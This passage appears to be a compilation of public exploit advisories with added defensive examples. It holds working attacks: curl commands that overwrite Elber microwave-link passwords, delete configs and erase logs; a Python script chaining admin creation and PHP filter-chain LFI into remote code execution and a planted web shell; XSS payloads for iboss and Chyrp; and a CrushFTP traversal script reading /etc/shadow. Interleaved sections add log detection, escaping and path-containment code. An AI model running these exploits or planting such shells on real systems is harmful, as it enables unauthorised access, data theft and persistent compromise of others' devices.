$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()

# Etc.
-
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Authentication Bypass

Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 0.01 Revision 0

Summary: The REBLE610 features an accurate hardware design, absence of internal cabling and full modularity. The unit is composed of a basic chassis with 4 extractable boards, which makes maintenance and critical operations, like frequency modification, easy and efficient. The modular approach has led to the development of the digital processing module (containing modulator, demodulator and data interface) and the RF module (containing Transmitter, Receiver and channel filters). From an RF point of view, the new transmission circuitry is able to guarantee around 1 Watt with every modulation scheme, introducing, in addition, wideband precorrection (up to 1GHz depending on frequency band).

Desc: The device suffers from an authentication bypass vulnerability through direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint, which lets them overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application, compromising the device's system security.

--------------------------------------------------------------------------
/modules/pwd.html (lines 50-59)
------------------

function apply_pwd(level, pwd)
{
  $.get("json_data/set_pwd", {lev:level, pass:pwd},
  function(data){
    //$.alert({title:'Operation',text:data});
    show_message(data);
  }).fail(function(error){
    show_message('Error ' + error.status, 'error');
  });
}
--------------------------------------------------------------------------

Tested on: NBFM Controller embOS/IP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2024-5818
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5818.php

18.08.2023

--

$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234

Ref (lev param):
Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)
-
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device Config

Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 0.01 Revision 0

Summary: The REBLE610 features an accurate hardware design, absence of internal cabling and full modularity. The unit is composed of a basic chassis with 4 extractable boards, which makes maintenance and critical operations, like frequency modification, easy and efficient. The modular approach has led to the development of the digital processing module (containing modulator, demodulator and data interface) and the RF module (containing transmitter, receiver and channel filters). From an RF point of view, the new transmission circuitry is able to guarantee around 1 Watt with every modulation scheme, introducing, in addition, wideband precorrection (up to 1GHz depending on frequency band).

Desc: The device suffers from unauthenticated device configuration and client-side hidden functionality disclosure. The configuration endpoints under /json_data/ (fan settings, configuration delete, upgrade launch, log erase, RX configuration) accept changes without any authentication, and the web UI ships hidden factory functions that can be invoked from the browser console.

Tested on: NBFM Controller embOS/IP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2024-5819
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5819.php

18.08.2023

--

# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied

# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully

# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully

# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased

# Until:
# =0   ALL
# =-2  Yesterday
# =-8  Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month

# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully

# Show factory window and FPGA upload (browser console)
> cleber_show_factory_wnd()

# Etc.
-
Clinic Queuing System 1.0 - RCE
# Exploit Title: Clinic Queuing System 1.0 RCE
# Date: 2024/1/7
# Exploit Author: Juan Marco Sanchez
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html
# Version: 1.0
# Tested on: Debian Linux Apache Web Server
# CVE: CVE-2024-0264 and CVE-2024-0265

import argparse
import random
import sys

import requests
from bs4 import BeautifulSoup

parser = argparse.ArgumentParser()
parser.add_argument("target")
args = parser.parse_args()

base_url = args.target
phase1_url = base_url + '/LoginRegistration.php?a=save_user'
phase2_url = base_url + '/LoginRegistration.php?a=login'

# PHP filter chain: the iconv/base64 steps prepend a PHP stub that evaluates
# $_GET[0] to the included resource "home", turning the LFI in ?page= into
# code execution (the payloads below are passed in parameter 0).
filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=home"


def die():
    sys.exit(1)


def phase1():
    # CVE-2024-0264: save_user creates an administrator account without authentication
    rand_user = 'pwn_' + str(random.randint(100, 313))
    rand_pass = 'pwn_' + str(random.randint(100, 313))
    pwn_user_data = {'formToken': '', 'fullname': 'pwn!', 'username': rand_user,
                     'password': rand_pass, 'status': 1, 'type': 1}
    print("[*] adding administrator " + rand_user + ":" + rand_pass)
    phase1 = requests.post(phase1_url, pwn_user_data)
    if "User Account has been added successfully." in phase1.text:
        print("[+] Phase 1 Success - Admin user added!\n")
        print("[*] Initiating Phase 2")
        phase2(rand_user, rand_pass)
    else:
        print("[X] user creation failed :(")
        die()


def phase2(user, password):
    # CVE-2024-0265: local file inclusion in ?page=, reached with the new admin session
    s = requests.Session()
    login_data = {'formToken': '', 'username': user, 'password': password}
    print("[*] Logging in....")
    phase2 = s.post(phase2_url, login_data)
    if "Login successfully." in phase2.text:
        print("[+] Login success")
    else:
        print("[X] Login failed.")
        die()
    print("[+] Preparing for RCE via LFI PHP Filter Chaining...\n")
    rce_url = base_url + "/?page=" + filter_chain + "&0=echo '|jmrcsnchz|<pre>'.shell_exec('id').'</pre>';"
    # print("[*] Payload: " + rce_url)
    rce = s.get(rce_url)
    if "jmrcsnchz" in rce.text:
        print("[+] RCE success!")
        soup = BeautifulSoup(rce.text, 'html.parser')
        print("[+] Output of id: " + soup.pre.get_text())
        print("[*] Uploading php backdoor....")
        # PD89YCRfR0VUWzBdYD8+ is base64 for <?=`$_GET[0]`?> (the '+' is URL-encoded as %2b)
        s.get(base_url + "/?page=" + filter_chain + "&0=file_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'));")
        print("[+] Access at " + base_url + "/rce.php?0=whoami")
    else:
        print("[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.")
        die()


try:
    print("[*] Initiating Phase 1")
    phase1()
except requests.exceptions.RequestException as e:
    print("Exploit failed: " + str(e))
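As an added example, not part of the exploit above and not code from the Clinic Queuing System, here is the detection side of the same technique: a scan over web-server access-log lines that flags php://filter chains like the one the script sends, including URL-encoded variants. The log lines are constructed for this example, and the thresholds (at least three convert.iconv steps plus a base64 step) are this example's own heuristic.

```python
"""Added example (not from the exploit above): flag access-log lines that
carry a PHP filter chain of the kind used for the Clinic Queuing System
RCE. SAMPLE_LOG is constructed; the heuristics are this example's own."""
import re
from urllib.parse import unquote

# A filter chain is a php://filter URL whose chain strings together many
# convert.iconv.* steps with convert.base64-decode/encode between them.
FILTER_RE = re.compile(r"php://filter/", re.IGNORECASE)
ICONV_RE = re.compile(r"convert\.iconv\.[A-Z0-9_\-]+\.[A-Z0-9_\-]+", re.IGNORECASE)
B64_RE = re.compile(r"convert\.base64-(?:de|en)code", re.IGNORECASE)

# Request target out of an Apache/nginx combined-format line.
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def score_request(target):
    """Count filter-chain indicators in one request target."""
    decoded = unquote(unquote(target))  # handle single and double URL encoding
    return {
        "php_filter": bool(FILTER_RE.search(decoded)),
        "iconv_steps": len(ICONV_RE.findall(decoded)),
        "base64_steps": len(B64_RE.findall(decoded)),
    }


def is_filter_chain(target, min_iconv=3):
    """True when the target is a php://filter URL carrying a conversion chain.
    A lone php://filter/read=... (also abusable, but not a chain) is not flagged."""
    s = score_request(target)
    return s["php_filter"] and s["iconv_steps"] >= min_iconv and s["base64_steps"] >= 1


def scan_log(lines):
    """Yield (line_number, target, score) for every line the heuristic matches."""
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m and is_filter_chain(m.group(1)):
            yield n, m.group(1), score_request(m.group(1))


# Constructed sample log lines (not real traffic); line 2 uses a shortened
# chain, line 3 the same idea URL-encoded, line 4 a plain php://filter read.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Jan/2024:10:00:01 +0000] "GET /?page=home HTTP/1.1" 200 1234',
    '203.0.113.5 - - [07/Jan/2024:10:00:02 +0000] "GET /?page=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.base64-decode/resource=home&0=phpinfo(); HTTP/1.1" 200 5678',
    '203.0.113.5 - - [07/Jan/2024:10:00:03 +0000] "GET /?page=php%3A%2F%2Ffilter%2Fconvert.iconv.UTF8.UTF7%7Cconvert.iconv.JS.UNICODE%7Cconvert.iconv.L4.UCS2%7Cconvert.base64-decode%2Fresource%3Dhome HTTP/1.1" 200 91',
    '198.51.100.7 - - [07/Jan/2024:10:00:04 +0000] "GET /?page=php://filter/read=string.toupper/resource=home HTTP/1.1" 200 1234',
]


def hits():
    """Matches over the constructed sample; returns a list for easy checking."""
    return list(scan_log(SAMPLE_LOG))


if __name__ == "__main__":
    for n, target, score in hits():
        print(f"line {n}: {score} {target[:60]}...")
```

A real chain is several kilobytes long, so a cheap pre-filter on request length or on the literal string `convert.iconv.` keeps the regex work off the hot path; the decoding step matters because proxies log the target as sent, and the exploit's `|` and `/` arrive either raw or percent-encoded.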
-
iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)
# Exploit Title: iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)
# Date: 4/4/2024
# Exploit Author: modrnProph3t
# Vendor Homepage: https://www.iboss.com
# Version: < 10.2.0
# CVE: CVE-2024-3378
# Reference: https://github.com/modrnProph3t/CVE/blob/main/CVE-2024-3378.md

## Description

A stored Cross-Site Scripting (XSS) vulnerability was found in the iboss Secure Web Gateway product. It is exploited by submitting a login attempt, intercepting the request, and adding a payload to the "redirectUrl" parameter before forwarding it to the server. After the request is submitted, visiting the initial login page causes the page to load with the previously submitted payload included. The attack is unauthenticated (the credentials do not need to be valid); the payload is stored on the server and included in every response to a GET request for the login page until a new POST request without a payload is made to the server.

## Proof of Concept

1. Access the login portal located at /login
2. Submit a login attempt and intercept the request

Example of unaltered request:

```
POST /user_login_submit HTTP/1.1
Host: <domain>
<--Headers Removed-->

userName=TEST&x=TEST&action=login&redirectUrl=
```

3. Insert the XSS payload into the "redirectUrl" parameter

Example of request with inserted payload:

```
POST /user_login_submit HTTP/1.1
Host: <domain>
<--Headers Removed-->

userName=TEST&x=TEST&action=login&redirectUrl="><script>alert('XSS')</script>
```

4. After the failed login attempt, return to the initial login page at the /login endpoint and observe payload execution
-
Apache mod_proxy_cluster - Stored XSS
# Apache mod_proxy_cluster - Stored XSS (CVE-2023-6710)
# The cluster-manager page reflects the Alias query parameter into its HTML
# without escaping. This script fetches the cluster-manager page, finds a link
# that carries an Alias value, replaces that value with a marker and checks
# whether the marker comes back unescaped.

import argparse
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse

import requests
from bs4 import BeautifulSoup


class Colors:
    RED = '\033[91m'
    GREEN = '\033[1;49;92m'
    RESET = '\033[0m'


BANNER = "POC by github.com/DedSec-47"


def get_cluster_manager_url(base_url, path):
    print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)
    try:
        response = requests.get(base_url + path)
        response.raise_for_status()
    except requests.exceptions.RequestException as e:
        print(Colors.RED + f"Error: {e}" + Colors.RESET)
        return None

    print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)
    if response.status_code == 200:
        print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)
        # Parse the HTML and look for an <a href> whose query string carries Alias
        soup = BeautifulSoup(response.text, 'html.parser')
        cluster_manager_url = None
        for link in soup.find_all('a', href=True):
            parsed_url = urlparse(link['href'])
            query_params = parse_qs(parsed_url.query)
            alias_value = query_params.get('Alias', [None])[0]
            if alias_value:
                print(Colors.GREEN + "Alias value found" + Colors.RESET)
                cluster_manager_url = link['href']
                break
        if cluster_manager_url:
            print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)
            return cluster_manager_url
        print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)
        return None

    print(Colors.RED + f"Error: Unable to get the initial step on {base_url}" + Colors.RESET)
    return None


def update_alias_value(url):
    # Replace the Alias value with a marker that cannot survive HTML escaping
    parsed_url = urlparse(url)
    query_params = parse_qs(parsed_url.query, keep_blank_values=True)
    query_params['Alias'] = ["<DedSec-47>"]
    updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))
    print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)
    return updated_url


def check_response_for_value(url, check_value):
    # The marker travels URL-encoded; it only appears verbatim in the body if
    # the server decodes it and writes it into the page without escaping
    response = requests.get(url)
    if check_value in response.text:
        print(Colors.RED + "Website is vulnerable. " + BANNER + Colors.RESET)
    else:
        print(Colors.GREEN + "Website is not vulnerable. " + BANNER + Colors.RESET)


def main():
    parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")
    parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)
    parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)
    args = parser.parse_args()

    cluster_manager_url = get_cluster_manager_url(args.target, args.url)
    if cluster_manager_url:
        # The href found on the page is relative, so prefix the target origin
        modified_url = update_alias_value(args.target + cluster_manager_url)
        print(Colors.GREEN + "Check executed successfully" + Colors.RESET)
        check_response_for_value(modified_url, "<DedSec-47>")


if __name__ == "__main__":
    main()
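Added example serving both the iboss redirectUrl finding and the mod_proxy_cluster Alias finding above; it is not code from iboss, from Apache httpd, or from either author. It shows the rendering pattern the two bugs share, a request value written into an HTML attribute without escaping, beside the escaped form, and adds a same-site check for the redirect target so that fixing the XSS does not leave an open redirect behind. The template markup, the attribute names and the safe_redirect() policy are this example's assumptions about how such a page is built.

```python
"""Added example, not code from iboss, Apache or either advisory: the
attribute-context rendering bug behind both XSS findings and its fix with
Python's html module. Template and parameter handling are assumed."""
import html
from urllib.parse import urlsplit

# Payloads taken from the two advisories above.
IBOSS_PAYLOAD = '"><script>alert(\'XSS\')</script>'
CLUSTER_MARKER = "<DedSec-47>"


def render_vulnerable(value, field="redirectUrl"):
    """Interpolates the raw value into an attribute (the bug)."""
    return f'<input type="hidden" name="{field}" value="{value}">'


def render_fixed(value, field="redirectUrl"):
    """Escapes for the attribute context; quote=True also encodes " and '."""
    return f'<input type="hidden" name="{field}" value="{html.escape(value, quote=True)}">'


def safe_redirect(value, default="/"):
    """Accept only same-site relative paths: no scheme, no host, no '//' prefix.
    Escaping stops the script injection; this stops the redirect abuse."""
    parts = urlsplit(value)
    if parts.scheme or parts.netloc or not value.startswith("/") or value.startswith("//"):
        return default
    return value


def attribute_breakout(markup):
    """True when more than the one expected tag opener appears, i.e. the
    value closed the attribute and injected its own markup."""
    return markup.count("<") > 1


def demo():
    """Run both payloads through the vulnerable and the fixed renderer."""
    return {
        "vulnerable": attribute_breakout(render_vulnerable(IBOSS_PAYLOAD)),
        "fixed": attribute_breakout(render_fixed(IBOSS_PAYLOAD)),
        "alias_vulnerable": attribute_breakout(render_vulnerable(CLUSTER_MARKER, field="Alias")),
        "alias_fixed": attribute_breakout(render_fixed(CLUSTER_MARKER, field="Alias")),
        "redirect": safe_redirect(IBOSS_PAYLOAD),
        "redirect_ok": safe_redirect("/dashboard?x=1"),
    }


if __name__ == "__main__":
    print(render_vulnerable(IBOSS_PAYLOAD))
    print(render_fixed(IBOSS_PAYLOAD))
    print(demo())
```

The fixed renderer turns the iboss payload into `&quot;&gt;&lt;script&gt;...`, which the browser shows as text inside the attribute; the mod_proxy_cluster marker is the same check with a simpler probe string, which is why the scanner above can look for a literal `<DedSec-47>` in the body.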
-
Plantronics Hub 3.25.1 - Arbitrary File Read
# Exploit Title: Plantronics Hub 3.25.1 - Arbitrary File Read
# Date: 2024-05-10
# Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from Mastercard
# Vendor Homepage: https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895
# Version: Plantronics Hub for Windows version 3.25.1
# Tested on: Windows 10/11
# CVE : CVE-2024-27460

As a regular user, drop a file called "MajorUpgrade.config" inside the "C:\ProgramData\Plantronics\Spokes3G" directory. Create it with the following cmd.exe one-liner (the carets escape the pipe characters, so the file itself contains ||<FULL-PATH-TO-YOUR-DESIRED-FILE>|):

echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config

Replace <FULL-PATH-TO-YOUR-DESIRED-FILE> with the file you want to read/copy (any file on the system). The file will be copied into C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp, where the regular user can read it.

Steps to reproduce (POC):

- Open cmd.exe
- cd C:\ProgramData\Plantronics\Spokes3G
- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
- The desired file is copied into C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp
-
CrushFTP < 11.1.0 - Directory Traversal
# Exploit Title: CrushFTP Directory Traversal
# Google Dork: N/A
# Date: 2024-04-30
# Exploit Author: Abdualhadi khalifa (https://twitter.com/absholi_ly)
# Vendor Homepage: https://www.crushftp.com/
# Software Link: https://www.crushftp.com/download/
# Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x)
# Tested on: Windows10

import re

import requests


# Regular expression to validate the URL (Django-style validator)
def is_valid_url(url):
    regex = re.compile(
        r'^(?:http|ftp)s?://'  # http:// or https://
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'  # domain...
        r'localhost|'  # localhost...
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|'  # ...or ipv4
        r'\[?[A-F0-9]*:[A-F0-9:]+\]?)'  # ...or ipv6
        r'(?::\d+)?'  # optional: port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
    return re.match(regex, url) is not None


# Function to scan for the vulnerability
def scan_for_vulnerability(url, target_files):
    print("Scanning for vulnerability in the following files:")
    for target_file in target_files:
        print(target_file)
    for target_file in target_files:
        try:
            # The traversal sequence is carried in the query string, after "?/"
            response = requests.get(url + "?/../../../../../../../../../../" + target_file, timeout=10)
            # Note: this only checks that the file's base name appears in the
            # body, so a 200 page that echoes the requested name also matches;
            # read the printed body before trusting the result.
            if response.status_code == 200 and target_file.split('/')[-1] in response.text:
                print("vulnerability detected in file", target_file)
                print("Content of file", target_file, ":")
                print(response.text)
            else:
                print("vulnerability not detected or unexpected response for file", target_file)
        except requests.exceptions.RequestException as e:
            print("Error connecting to the server:", e)


# User input
input_url = input("Enter the URL of the CrushFTP server: ")

# Validate the URL
if is_valid_url(input_url):
    # Expanded list of allowed files (Unix-style paths; adjust for Windows hosts)
    target_files = [
        "/var/www/html/index.php",
        "/var/www/html/wp-config.php",
        "/etc/passwd",
        "/etc/shadow",
        "/etc/hosts",
        "/etc/ssh/sshd_config",
        "/etc/mysql/my.cnf",
        # Add more files as needed
    ]
    # Start the scan
    scan_for_vulnerability(input_url, target_files)
else:
    print("Invalid URL entered. Please enter a valid URL.")
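Added example (not CrushFTP code): the containment check a file server needs so that ../ sequences, whether raw, URL-encoded, or carried in the query string the way the scanner above sends them, cannot resolve outside the document root. The candidate_from_target() model of the "?/" trick and the temporary directory layout are this example's assumptions; the check itself is the standard normalise-then-compare pattern.

```python
"""Added example (not CrushFTP's code): resolve a requested name under a
document root and refuse anything that normalises outside it. The "?/"
handling models the PoC above and is an assumption, not CrushFTP parsing."""
import os
import tempfile
from urllib.parse import unquote


def candidate_from_target(target):
    """Model of the PoC's "?/../.." trick: when the query string starts with a
    slash, treat it as the requested path (assumed behaviour of the
    vulnerable server, used here only to feed the containment check)."""
    path, sep, query = target.partition("?")
    if sep and query.startswith("/"):
        return query
    return path


def resolve_under_root(root, candidate):
    """Absolute path of `candidate` inside `root`, or None if the normalised
    path leaves the root. Works on the string, so it does not depend on the
    target existing and cannot be bypassed by what is on disk."""
    root = os.path.realpath(root)
    joined = os.path.normpath(os.path.join(root, unquote(candidate).lstrip("/")))
    try:
        if os.path.commonpath([root, joined]) != root:
            return None
    except ValueError:  # different drives on Windows
        return None
    return joined


def demo():
    """Constructed root with docs/readme.txt; returns root-relative results."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "docs"))
        with open(os.path.join(root, "docs", "readme.txt"), "w") as fh:
            fh.write("hello\n")
        real_root = os.path.realpath(root)
        for target in ("docs/readme.txt",
                       "?/../../../../../../etc/passwd",   # the scanner's form
                       "..%2F..%2Fetc%2Fpasswd",            # URL-encoded
                       "docs/../docs/readme.txt"):           # harmless ..
            resolved = resolve_under_root(root, candidate_from_target(target))
            results[target] = None if resolved is None else os.path.relpath(resolved, real_root)
    return results


if __name__ == "__main__":
    for target, outcome in demo().items():
        print(f"{target!r:40} -> {outcome}")
```

Decoding once before normalising is deliberate: a server that normalises first and decodes afterwards lets `%2F` reintroduce the separator that the check just removed.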
-
Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)
# Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)
# Date: 2024-04-24
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://github.com/chyrp/
# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip
# Version: 2.5.2
# Tested on: MacOS

### Steps to Reproduce ###

- Log in at: http://localhost/chyrp/?action=login.
- Click on 'Write'.
- Type this payload into the 'Title' field: "><img src=x onerror=alert("Stored")>
- Fill in the 'Body' area and click 'Publish'.
- An alert box saying "Stored" appears.

### PoC Request ###

POST /chyrp/admin/?action=add_post HTTP/1.1
Host: localhost
Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11; show_more_options=true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------28307567523233313132815561598
